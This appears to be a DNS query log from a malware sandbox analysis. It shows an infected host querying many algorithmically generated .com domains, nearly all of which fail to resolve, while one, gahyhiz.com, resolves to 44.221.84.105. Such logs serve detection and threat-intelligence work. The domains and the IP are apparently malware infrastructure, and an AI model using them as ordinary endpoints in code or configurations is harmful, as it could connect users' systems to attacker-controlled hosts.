Aug 23, 2024 18:43:31.770452976 CEST	1.1.1.1	192.168.2.5	0x343d	Name error (3)	lygylur.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.774959087 CEST	1.1.1.1	192.168.2.5	0x2be9	Name error (3)	qeqyhol.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.774990082 CEST	1.1.1.1	192.168.2.5	0xd2c2	Name error (3)	volycem.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.775001049 CEST	1.1.1.1	192.168.2.5	0x1791	Name error (3)	pufytip.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.775085926 CEST	1.1.1.1	192.168.2.5	0x1a74	Name error (3)	lymygor.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.778767109 CEST	1.1.1.1	192.168.2.5	0x4851	Name error (3)	lysywyd.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.779624939 CEST	1.1.1.1	192.168.2.5	0xd09e	Name error (3)	qetyqag.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.781040907 CEST	1.1.1.1	192.168.2.5	0xa22	Name error (3)	purymog.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.783874035 CEST	1.1.1.1	192.168.2.5	0xc243	Name error (3)	puzyceg.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.785628080 CEST	1.1.1.1	192.168.2.5	0xb4eb	Name error (3)	vofykyt.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.787131071 CEST	1.1.1.1	192.168.2.5	0x768f	Name error (3)	lysyjex.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.787174940 CEST	1.1.1.1	192.168.2.5	0x3ab	Name error (3)	galypob.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.787223101 CEST	1.1.1.1	192.168.2.5	0x4a6	Name error (3)	vonybuk.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.787231922 CEST	1.1.1.1	192.168.2.5	0x35c8	Name error (3)	pujytug.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.788044930 CEST	1.1.1.1	192.168.2.5	0xe99d	Name error (3)	lyvyver.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.907998085 CEST	1.1.1.1	192.168.2.5	0x7e07	Name error (3)	pujyxoq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.908010960 CEST	1.1.1.1	192.168.2.5	0xfbee	Name error (3)	vopyqef.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.910789967 CEST	1.1.1.1	192.168.2.5	0xe17a	Name error (3)	lyxyvyn.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.911484003 CEST	1.1.1.1	192.168.2.5	0x6311	Name error (3)	gatyqeb.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.931238890 CEST	1.1.1.1	192.168.2.5	0xe8ca	Name error (3)	lymynuj.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.933526039 CEST	1.1.1.1	192.168.2.5	0xd17a	Name error (3)	vojyrum.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.949737072 CEST	1.1.1.1	192.168.2.5	0x512c	Name error (3)	purygiv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.949748993 CEST	1.1.1.1	192.168.2.5	0xd9c3	Name error (3)	vocycat.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.949759007 CEST	1.1.1.1	192.168.2.5	0x1f7d	Name error (3)	lygywyj.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.949872017 CEST	1.1.1.1	192.168.2.5	0x4eb3	Name error (3)	qexyxop.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.949882030 CEST	1.1.1.1	192.168.2.5	0xee15	Name error (3)	gacycaz.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.949891090 CEST	1.1.1.1	192.168.2.5	0xbf55	Name error (3)	pufyweq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.949901104 CEST	1.1.1.1	192.168.2.5	0xafaa	Name error (3)	lymyfyn.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.949908972 CEST	1.1.1.1	192.168.2.5	0x2309	Name error (3)	gaqyfub.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.950505972 CEST	1.1.1.1	192.168.2.5	0x7626	Name error (3)	lyxyxox.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.950725079 CEST	1.1.1.1	192.168.2.5	0x5602	Name error (3)	vofyqek.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.951402903 CEST	1.1.1.1	192.168.2.5	0xbc8e	Name error (3)	vowyguf.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.951411009 CEST	1.1.1.1	192.168.2.5	0xb6df	Name error (3)	puzyxip.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.952374935 CEST	1.1.1.1	192.168.2.5	0x761c	Name error (3)	pumydyg.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.955374956 CEST	1.1.1.1	192.168.2.5	0xa3ba	Name error (3)	galyzus.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.955384016 CEST	1.1.1.1	192.168.2.5	0x2d0c	Name error (3)	volyzic.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.955394983 CEST	1.1.1.1	192.168.2.5	0x7eed	Name error (3)	qekyluv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.955430984 CEST	1.1.1.1	192.168.2.5	0xfa7e	Name error (3)	pupymol.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.955480099 CEST	1.1.1.1	192.168.2.5	0xfa96	Name error (3)	lykylud.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.955488920 CEST	1.1.1.1	192.168.2.5	0x42be	Name error (3)	ganydeh.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.955497026 CEST	1.1.1.1	192.168.2.5	0xb8d0	Name error (3)	lysymor.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.955507040 CEST	1.1.1.1	192.168.2.5	0xd0b0	Name error (3)	pujylyv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.955583096 CEST	1.1.1.1	192.168.2.5	0x62be	Name error (3)	qebysaq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.955929041 CEST	1.1.1.1	192.168.2.5	0xf422	Name error (3)	vojykyf.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.956048965 CEST	1.1.1.1	192.168.2.5	0xf422	Name error (3)	qetynup.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.956659079 CEST	1.1.1.1	192.168.2.5	0x4a20	Name error (3)	lyrynux.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.956717968 CEST	1.1.1.1	192.168.2.5	0x9245	Name error (3)	lyvysaj.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.957580090 CEST	1.1.1.1	192.168.2.5	0xc7c	Name error (3)	gatyniz.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.958503962 CEST	1.1.1.1	192.168.2.5	0xb9ed	Name error (3)	qegykeg.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.958707094 CEST	1.1.1.1	192.168.2.5	0x9382	Name error (3)	gahykeb.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.958925962 CEST	1.1.1.1	192.168.2.5	0x82d1	Name error (3)	vocypok.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.960402966 CEST	1.1.1.1	192.168.2.5	0x99ee	Name error (3)	lygyjan.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.960982084 CEST	1.1.1.1	192.168.2.5	0xe559	Name error (3)	gaqyvys.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.961478949 CEST	1.1.1.1	192.168.2.5	0xa9e4	Name error (3)	qeqyvev.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.961715937 CEST	1.1.1.1	192.168.2.5	0xd15d	Name error (3)	vowybyc.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.962903023 CEST	1.1.1.1	192.168.2.5	0x9d18	Name error (3)	lyxytur.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.962918997 CEST	1.1.1.1	192.168.2.5	0xf245	Name error (3)	puzytul.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.963120937 CEST	1.1.1.1	192.168.2.5	0x909	Name error (3)	pufyjag.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.963481903 CEST	1.1.1.1	192.168.2.5	0x193d	Name error (3)	galyryz.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.963998079 CEST	1.1.1.1	192.168.2.5	0x521f	Name error (3)	lymyved.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.964389086 CEST	1.1.1.1	192.168.2.5	0x2f11	Name error (3)	vonycaf.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.964432955 CEST	1.1.1.1	192.168.2.5	0x5f68	Name error (3)	lykywex.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.964442968 CEST	1.1.1.1	192.168.2.5	0xfb2c	Name error (3)	lysygij.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.964596033 CEST	1.1.1.1	192.168.2.5	0x7dd5	Name error (3)	qekyryp.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.965202093 CEST	1.1.1.1	192.168.2.5	0x7ad3	Name error (3)	pupyguq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.966108084 CEST	1.1.1.1	192.168.2.5	0x26c3	Name error (3)	ganycob.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.967344046 CEST	1.1.1.1	192.168.2.5	0x388b	Name error (3)	puvycel.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.968674898 CEST	1.1.1.1	192.168.2.5	0xf9b	Name error (3)	qegyryq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.970987082 CEST	1.1.1.1	192.168.2.5	0x2ab4	Name error (3)	lyrygid.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.971400023 CEST	1.1.1.1	192.168.2.5	0xa962	Name error (3)	gahyruh.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.972338915 CEST	1.1.1.1	192.168.2.5	0xa7fc	Name error (3)	gadyqaw.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.973454952 CEST	1.1.1.1	192.168.2.5	0xe524	Name error (3)	qedyqal.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.974967003 CEST	1.1.1.1	192.168.2.5	0x6b90	Name error (3)	vonydem.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.975922108 CEST	1.1.1.1	192.168.2.5	0x1219	Name error (3)	qeqyfug.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.976151943 CEST	1.1.1.1	192.168.2.5	0x703f	Name error (3)	vopymit.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.978234053 CEST	1.1.1.1	192.168.2.5	0x6f96	Name error (3)	puvypoq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.979398966 CEST	1.1.1.1	192.168.2.5	0xb464	Name error (3)	gacypiw.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.984822035 CEST	1.1.1.1	192.168.2.5	0x196c	Name error (3)	qedyhiq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.984858036 CEST	1.1.1.1	192.168.2.5	0x5188	Name error (3)	purybup.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.984983921 CEST	1.1.1.1	192.168.2.5	0x78ff	Name error (3)	vofyjom.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.985738039 CEST	1.1.1.1	192.168.2.5	0x2f8c	Name error (3)	qexytil.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.985748053 CEST	1.1.1.1	192.168.2.5	0xb0a5	Name error (3)	vopyguk.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.986140966 CEST	1.1.1.1	192.168.2.5	0x34a6	Name error (3)	pumycav.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.987196922 CEST	1.1.1.1	192.168.2.5	0x5132	Name error (3)	volyrut.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.522715092 CEST	1.1.1.1	192.168.2.5	0x163f	Name error (3)	gatyfuw.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.522967100 CEST	1.1.1.1	192.168.2.5	0xd3d7	Name error (3)	pujywep.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.523848057 CEST	1.1.1.1	192.168.2.5	0x2ead	Name error (3)	puvyxig.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.524007082 CEST	1.1.1.1	192.168.2.5	0x14d9	Name error (3)	qetyfyl.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.525108099 CEST	1.1.1.1	192.168.2.5	0xac42	Name error (3)	purydel.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.525228977 CEST	1.1.1.1	192.168.2.5	0x5729	Name error (3)	qegyqov.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.525363922 CEST	1.1.1.1	192.168.2.5	0x370f	Name error (3)	qebyxog.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.525686979 CEST	1.1.1.1	192.168.2.5	0xa43d	Name error (3)	vocyzum.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.526022911 CEST	1.1.1.1	192.168.2.5	0x26ef	Name error (3)	gahyqas.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.526711941 CEST	1.1.1.1	192.168.2.5	0x503c	Name error (3)	gacyzuh.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.526758909 CEST	1.1.1.1	192.168.2.5	0xac91	Name error (3)	lygymod.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.527580023 CEST	1.1.1.1	192.168.2.5	0xff9f	Name error (3)	lyryfyr.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.528636932 CEST	1.1.1.1	192.168.2.5	0x2e2a	Name error (3)	lyxylyj.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.529427052 CEST	1.1.1.1	192.168.2.5	0x6d68	Name error (3)	vowydet.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.529869080 CEST	1.1.1.1	192.168.2.5	0xcbca	Name error (3)	vofymif.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.530837059 CEST	1.1.1.1	192.168.2.5	0xc656	Name error (3)	qeqysap.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.530853033 CEST	1.1.1.1	192.168.2.5	0xe811	Name error (3)	puzylyq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.532783985 CEST	1.1.1.1	192.168.2.5	0x418a	Name error (3)	lymysox.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.533226013 CEST	1.1.1.1	192.168.2.5	0x7678	Name error (3)	qedynug.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.534679890 CEST	1.1.1.1	192.168.2.5	0x6914	Name error (3)	galykew.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.535517931 CEST	1.1.1.1	192.168.2.5	0x28dc	Name error (3)	pumypop.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.540582895 CEST	1.1.1.1	192.168.2.5	0x29aa	Name error (3)	ganypis.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.540853977 CEST	1.1.1.1	192.168.2.5	0xa80b	Name error (3)	lykyjar.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.541129112 CEST	1.1.1.1	192.168.2.5	0x3904	Name error (3)	vonypic.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.541358948 CEST	1.1.1.1	192.168.2.5	0x306e	Name error (3)	lysynun.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.541668892 CEST	1.1.1.1	192.168.2.5	0x98a5	Name error (3)	pupybyg.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.541719913 CEST	1.1.1.1	192.168.2.5	0x702d	Name error (3)	qebytuv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.542984962 CEST	1.1.1.1	192.168.2.5	0xb69a	Name error (3)	puvytuv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.543075085 CEST	1.1.1.1	192.168.2.5	0xc747	Name error (3)	pujyjol.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.543354988 CEST	1.1.1.1	192.168.2.5	0x41e1	Name error (3)	vojyjot.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.543456078 CEST	1.1.1.1	192.168.2.5	0x4a0e	Name error (3)	lyvytud.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.544414043 CEST	1.1.1.1	192.168.2.5	0x361a	Name error (3)	qetyveq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.545243979 CEST	1.1.1.1	192.168.2.5	0x2aef	Name error (3)	purycaq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.545274973 CEST	1.1.1.1	192.168.2.5	0x9bb3	Name error (3)	lyryvaj.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.545444965 CEST	1.1.1.1	192.168.2.5	0x35be	Name error (3)	qegyhip.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.546307087 CEST	1.1.1.1	192.168.2.5	0xdbf5	Name error (3)	vojyqac.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.546317101 CEST	1.1.1.1	192.168.2.5	0x9f1d	Name error (3)	gacyryb.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.546325922 CEST	1.1.1.1	192.168.2.5	0x27a2	Name error (3)	lygygux.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.547663927 CEST	1.1.1.1	192.168.2.5	0xbe48	Name error (3)	vowycok.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.548702002 CEST	1.1.1.1	192.168.2.5	0x5ab6	Name error (3)	qexyluq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.548712015 CEST	1.1.1.1	192.168.2.5	0xed3a	Name error (3)	pufymiv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.550643921 CEST	1.1.1.1	192.168.2.5	0xc4ae	Name error (3)	lyvyxin.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.553472996 CEST	1.1.1.1	192.168.2.5	0x6091	Name error (3)	gaqydaz.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.554867029 CEST	1.1.1.1	192.168.2.5	0x58c1	Name error (3)	gaqycow.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.554944992 CEST	1.1.1.1	192.168.2.5	0x6c6b	Name error (3)	lyxywen.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.555077076 CEST	1.1.1.1	192.168.2.5	0x378b	Name error (3)	gadyfys.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.555299997 CEST	1.1.1.1	192.168.2.5	0xca47	Name error (3)	vofyguc.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.555427074 CEST	1.1.1.1	192.168.2.5	0x9937	Name error (3)	puzywag.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.555839062 CEST	1.1.1.1	192.168.2.5	0xcb44	Name error (3)	pumyxul.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.555960894 CEST	1.1.1.1	192.168.2.5	0x146	Name error (3)	volyqam.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.556899071 CEST	1.1.1.1	192.168.2.5	0x496c	Name error (3)	lymyxir.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.557852030 CEST	1.1.1.1	192.168.2.5	0xe43e	Name error (3)	volykek.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.561000109 CEST	1.1.1.1	192.168.2.5	0xdb65	Name error (3)	qekykal.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.561672926 CEST	1.1.1.1	192.168.2.5	0x9532	Name error (3)	vopybym.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.563028097 CEST	1.1.1.1	192.168.2.5	0x2f05	Name error (3)	gatyveh.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.566848040 CEST	1.1.1.1	192.168.2.5	0x8903	Name error (3)	vocyryf.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.568636894 CEST	1.1.1.1	192.168.2.5	0x9211	Name error (3)	qexyreg.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.574007988 CEST	1.1.1.1	192.168.2.5	0xf5f7	Name error (3)	pufygup.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.575790882 CEST	1.1.1.1	192.168.2.5	0x621d	Name error (3)	qeqyxil.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.576781988 CEST	1.1.1.1	192.168.2.5	0x5f76	Name error (3)	lysyfed.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.576791048 CEST	1.1.1.1	192.168.2.5	0x4be8	Name error (3)	galyqoh.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.580720901 CEST	1.1.1.1	192.168.2.5	0xf7ee	Name error (3)	qedyfyv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.682169914 CEST	1.1.1.1	192.168.2.5	0x5555	Name error (3)	gadynub.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:32.734181881 CEST	1.1.1.1	192.168.2.5	0x6326	No error (0)	gahyhiz.com		44.221.84.105	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.026772022 CEST	1.1.1.1	192.168.2.5	0x83ea	No error (0)	gahyhiz.com		44.221.84.105	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.538000107 CEST	1.1.1.1	192.168.2.5	0xf4bc	Name error (3)	qekyqoq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.538381100 CEST	1.1.1.1	192.168.2.5	0xbcb4	Name error (3)	vopydaf.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.538691998 CEST	1.1.1.1	192.168.2.5	0x667d	Name error (3)	qebylyp.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.538836002 CEST	1.1.1.1	192.168.2.5	0xf7ab	Name error (3)	vonyzut.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.539619923 CEST	1.1.1.1	192.168.2.5	0x4364	Name error (3)	pujymiq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.539640903 CEST	1.1.1.1	192.168.2.5	0xb320	Name error (3)	vojymuk.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.540436983 CEST	1.1.1.1	192.168.2.5	0x5051	Name error (3)	qetysog.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.542385101 CEST	1.1.1.1	192.168.2.5	0xfe75	Name error (3)	puvylep.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.542989969 CEST	1.1.1.1	192.168.2.5	0x50be	Name error (3)	purypig.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.553795099 CEST	1.1.1.1	192.168.2.5	0x856	Name error (3)	gahynuw.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.553806067 CEST	1.1.1.1	192.168.2.5	0x824	Name error (3)	lyryson.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.553814888 CEST	1.1.1.1	192.168.2.5	0x745	Name error (3)	gacykas.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.554498911 CEST	1.1.1.1	192.168.2.5	0x313d	Name error (3)	vocykec.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.564357996 CEST	1.1.1.1	192.168.2.5	0xa661	Name error (3)	vowypim.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.564421892 CEST	1.1.1.1	192.168.2.5	0xb6cc	Name error (3)	lykymij.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.564475060 CEST	1.1.1.1	192.168.2.5	0xdf88	Name error (3)	ganyzuz.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.564490080 CEST	1.1.1.1	192.168.2.5	0xeba9	Name error (3)	pupydev.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.564526081 CEST	1.1.1.1	192.168.2.5	0xc5b6	Name error (3)	lyvylyx.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.564536095 CEST	1.1.1.1	192.168.2.5	0x4af3	Name error (3)	gatydab.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.565968037 CEST	1.1.1.1	192.168.2.5	0xa594	Name error (3)	qegynul.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.569936037 CEST	1.1.1.1	192.168.2.5	0x707d	Name error (3)	vofybet.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.569946051 CEST	1.1.1.1	192.168.2.5	0xb17d	Name error (3)	qeqytuq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.569953918 CEST	1.1.1.1	192.168.2.5	0x275a	Name error (3)	lyxyjod.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.569962978 CEST	1.1.1.1	192.168.2.5	0x23f7	Name error (3)	puzyjov.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.569983006 CEST	1.1.1.1	192.168.2.5	0x9da7	Name error (3)	pufybyl.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.570506096 CEST	1.1.1.1	192.168.2.5	0x9eb2	Name error (3)	gaqypuh.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.570518017 CEST	1.1.1.1	192.168.2.5	0x4885	Name error (3)	lygynyr.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.570910931 CEST	1.1.1.1	192.168.2.5	0xb697	Name error (3)	qexykav.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.571723938 CEST	1.1.1.1	192.168.2.5	0x1ca2	Name error (3)	volyjif.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.571980000 CEST	1.1.1.1	192.168.2.5	0x5ae0	Name error (3)	gadyvez.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.572112083 CEST	1.1.1.1	192.168.2.5	0x3011	Name error (3)	pumytyq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:33.572756052 CEST	1.1.1.1	192.168.2.5	0xae57	Name error (3)	lymytuj.com	none	none	A (IP address)	IN (0x0001)	false
